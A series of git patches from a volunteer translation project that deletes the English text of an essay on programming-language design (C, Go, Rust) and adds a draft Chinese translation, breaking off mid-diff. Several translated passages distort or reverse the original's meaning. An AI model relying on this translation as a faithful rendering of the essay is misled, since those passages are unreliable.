From 300061d988e7dafcc09761d000a98d6f5fc8b7a1 Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 15:55:46 +0800
Subject: [PATCH 001/371] Delete 20171118 Language engineering for great
justice.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
删除源文件
---
... Language engineering for great justice.md | 60 -------------------
1 file changed, 60 deletions(-)
delete mode 100644 sources/tech/20171118 Language engineering for great justice.md
diff --git a/sources/tech/20171118 Language engineering for great justice.md b/sources/tech/20171118 Language engineering for great justice.md
deleted file mode 100644
index 35d9bd854f..0000000000
--- a/sources/tech/20171118 Language engineering for great justice.md
+++ /dev/null
@@ -1,60 +0,0 @@
-Translating by ValoniaKim
-Language engineering for great justice
-============================================================
-
-Whole-systems engineering, when you get good at it, goes beyond being entirely or even mostly about technical optimizations. Every artifact we make is situated in a context of human action that widens out to the economics of its use, the sociology of its users, and the entirety of what Austrian economists call “praxeology”, the science of purposeful human behavior in its widest scope.
-
-This isn’t just abstract theory for me. When I wrote my papers on open-source development, they were exactly praxeology – they weren’t about any specific software technology or objective but about the context of human action within which technology is worked. An increase in praxeological understanding of technology can reframe it, leading to tremendous increases in human productivity and satisfaction, not so much because of changes in our tools but because of changes in the way we grasp them.
-
-In this, the third of my unplanned series of posts about the twilight of C and the huge changes coming as we actually begin to see forward into a new era of systems programming, I’m going to try to cash that general insight out into some more specific and generative ideas about the design of computer languages, why they succeed, and why they fail.
-
-In my last post I noted that every computer language is an embodiment of a relative-value claim, an assertion about the optimal tradeoff between spending machine resources and spending programmer time, all of this in a context where the cost of computing power steadily falls over time while programmer-time costs remain relatively stable or may even rise. I also highlighted the additional role of transition costs in pinning old tradeoff assertions into place. I described what language designers do as seeking a new optimum for present and near-future conditions.
-
-Now I’m going to focus on that last concept. A language designer has lots of possible moves in language-design space from where the state of the art is now. What kind of type system? GC or manual allocation? What mix of imperative, functional, or OO approaches? But in praxeological terms his choice is, I think, usually much simpler: attack a near problem or a far problem?
-
-“Near” and “far” are measured along the curves of falling hardware costs, rising software complexity, and increasing transition costs from existing languages. A near problem is one the designer can see right in front of him; a far problem is a set of conditions that can be seen coming but won’t necessarily arrive for some time. A near solution can be deployed immediately, to great practical effect, but may age badly as conditions change. A far solution is a bold bet that may smother under the weight of its own overhead before its future arrives, or never be adopted at all because moving to it is too expensive.
-
-Back at the dawn of computing, FORTRAN was a near-problem design, LISP a far-problem one. Assemblers are near solutions. Illustrating that the categories apply to non-general-purpose languages, also roff markup. Later in the game, PHP and Javascript. Far solutions? Oberon. Ocaml. ML. XML-Docbook. Academic languages tend to be far because the incentive structure around them rewards originality and intellectual boldness (note that this is a praxeological cause, not a technical one!). The failure mode of academic languages is predictable; high inward transition costs, nobody goes there, failure to achieve community critical mass sufficient for mainstream adoption, isolation, and stagnation. (That’s a potted history of LISP in one sentence, and I say that as an old LISP-head with a deep love for the language…)
-
-The failure modes of near designs are uglier. The best outcome to hope for is a graceful death and transition to a newer design. If they hang on (most likely to happen when transition costs out are high) features often get piled on them to keep them relevant, increasing complexity until they become teetering piles of cruft. Yes, C++, I’m looking at you. You too, Javascript. And (alas) Perl, though Larry Wall’s good taste mitigated the problem for many years – but that same good taste eventually moved him to blow up the whole thing for Perl 6.
-
-This way of thinking about language design encourages reframing the designer’s task in terms of two objectives. (1) Picking a sweet spot on the near-far axis away from you into the projected future; and (2) Minimizing inward transition costs from one or more existing languages so you co-opt their userbases. And now let’s talk about about how C took over the world.
-
-There is no more more breathtaking example than C than of nailing the near-far sweet spot in the entire history of computing. All I need to do to prove this is point at its extreme longevity as a practical, mainstream language that successfully saw off many competitors for its roles over much of its range. That timespan has now passed about 35 years (counting from when it swamped its early competitors) and is not yet with certainty ended.
-
-OK, you can attribute some of C’s persistence to inertia if you want, but what are you really adding to the explanation if you use the word “inertia”? What it means is exactly that nobody made an offer that actually covered the transition costs out of the language!
-
-Conversely, an underappreciated strength of the language was the low inward transition costs. C is an almost uniquely protean tool that, even at the beginning of its long reign, could readily accommodate programming habits acquired from languages as diverse as FORTRAN, Pascal, assemblers and LISP. I noticed back in the 1980s that I could often spot a new C programmer’s last language by his coding style, which was just the flip side of saying that C was damn good at gathering all those tribes unto itself.
-
-C++ also benefited from having low transition costs in. Later, most new languages at least partly copied C syntax in order to minimize them.Notice what this does to the context of future language designs: it raises the value of being a C-like as possible in order to minimize inward transition costs from anywhere.
-
-Another way to minimize inward transition costs is to simply be ridiculously easy to learn, even to people with no prior programming experience. This, however, is remarkably hard to pull off. I evaluate that only one language – Python – has made the major leagues by relying on this quality. I mention it only in passing because it’s not a strategy I expect to see a _systems_ language execute successfully, though I’d be delighted to be wrong about that.
-
-So here we are in late 2017, and…the next part is going to sound to some easily-annoyed people like Go advocacy, but it isn’t. Go, itself, could turn out to fail in several easily imaginable ways. It’s troubling that the Go team is so impervious to some changes their user community is near-unanimously and rightly (I think) insisting it needs. Worst-case GC latency, or the throughput sacrifices made to lower it, could still turn out to drastically narrow the language’s application range.
-
-That said, there is a grand strategy expressed in the Go design that I think is right. To understand it, we need to review what the near problem for a C replacement is. As I noted in the prequels, it is rising defect rates as systems projects scale up – and specifically memory-management bugs because that category so dominates crash bugs and security exploits.
-
-We’ve now identified two really powerful imperatives for a C replacement: (1) solve the memory-management problem, and (2) minimize inward-transition costs from C. And the history – the praxeological context – of programming languages tells us that if a C successor candidate don’t address the transition-cost problem effectively enough, it almost doesn’t matter how good a job it does on anything else. Conversely, a C successor that _does_ address transition costs well buys itself a lot of slack for not being perfect in other ways.
-
-This is what Go does. It’s not a theoretical jewel; it has annoying limitations; GC latency presently limits how far down the stack it can be pushed. But what it is doing is replicating the Unix/C infective strategy of being easy-entry and _good enough_ to propagate faster than alternatives that, if it didn’t exist, would look like better far bets.
-
-Of course, the proboscid in the room when I say that is Rust. Which is, in fact, positioning itself as the better far bet. I’ve explained in previous installments why I don’t think it’s really ready to compete yet. The TIOBE and PYPL indices agree; it’s never made the TIOBE top 20 and on both indices does quite poorly against Go.
-
-Where Rust will be in five years is a different question, of course. My advice to the Rust community, if they care, is to pay some serious attention to the transition-cost problem. My personal experience says the C to Rust energy barrier is _[nasty][2]_ . Code-lifting tools like Corrode won’t solve it if all they do is map C to unsafe Rust, and if there were an easy way to automate ownership/lifetime annotations they wouldn’t be needed at all – the compiler would just do that for you. I don’t know what a solution would look like, here, but I think they better find one.
-
-I will finally note that Ken Thompson has a history of designs that look like minimal solutions to near problems but turn out to have an amazing quality of openness to the future, the capability to _be improved_ . Unix is like this, of course. It makes me very cautious about supposing that any of the obvious annoyances in Go that look like future-blockers to me (like, say, the lack of generics) actually are. Because for that to be true, I’d have to be smarter than Ken, which is not an easy thing to believe.
-
---------------------------------------------------------------------------------
-
-via: http://esr.ibiblio.org/?p=7745
-
-作者:[Eric Raymond ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://esr.ibiblio.org/?author=2
-[1]:http://esr.ibiblio.org/?author=2
-[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
-[3]:http://esr.ibiblio.org/?p=7745
From 2f61d8d46e7cb305422db648c8d6eb47cb73cd74 Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 16:02:20 +0800
Subject: [PATCH 002/371] Create Language engineering for great justice
Translated by ValoniaK
---
.../Language engineering for great justice | 24 +++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 translated/tech/Language engineering for great justice
diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice
new file mode 100644
index 0000000000..d26f9319bd
--- /dev/null
+++ b/translated/tech/Language engineering for great justice
@@ -0,0 +1,24 @@
+最合理的语言工程模式
+当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
+对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
+在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
+在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
+现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
+所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
+在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
+如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
+这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
+在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
+当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
+相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
+C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
+另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
+今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
+即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
+我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
+这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
+当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
+五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
+在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
+
+
From 81aee45a065eef827369d23fea71e6f37469c17b Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 19:09:44 +0800
Subject: [PATCH 003/371] Language engineering for great justice.
Translated by Valoniakim
---
.../Language engineering for great justice. | 24 +++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 translated/tech/Language engineering for great justice.
diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice.
new file mode 100644
index 0000000000..7f982e0d19
--- /dev/null
+++ b/translated/tech/Language engineering for great justice.
@@ -0,0 +1,24 @@
+# 最合理的语言工程模式
+## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
+## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
+## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
+## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
+## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
+## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
+## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
+## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
+## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
+## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
+## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
+## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
+## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
+## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
+## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
+## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
+## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
+## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
+## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
+## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
+## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
+
+
From 85931826bbca0c9ec3188689d35449eaa478516f Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 20:11:40 +0800
Subject: [PATCH 004/371] Update Language engineering for great justice.
Translated by Valoniakim
---
.../Language engineering for great justice. | 83 +++++++++++++------
1 file changed, 59 insertions(+), 24 deletions(-)
diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/Language engineering for great justice.
index 7f982e0d19..301337b11c 100644
--- a/translated/tech/Language engineering for great justice.
+++ b/translated/tech/Language engineering for great justice.
@@ -1,24 +1,59 @@
-# 最合理的语言工程模式
-## 当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
-## 对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
-## 在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
-## 在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
-## 现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
-## 所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
-## 在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
-## 如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
-## 这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
-## 在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
-## 当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
-## 相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
-## C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
-## 另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
-## 今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
-## 即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
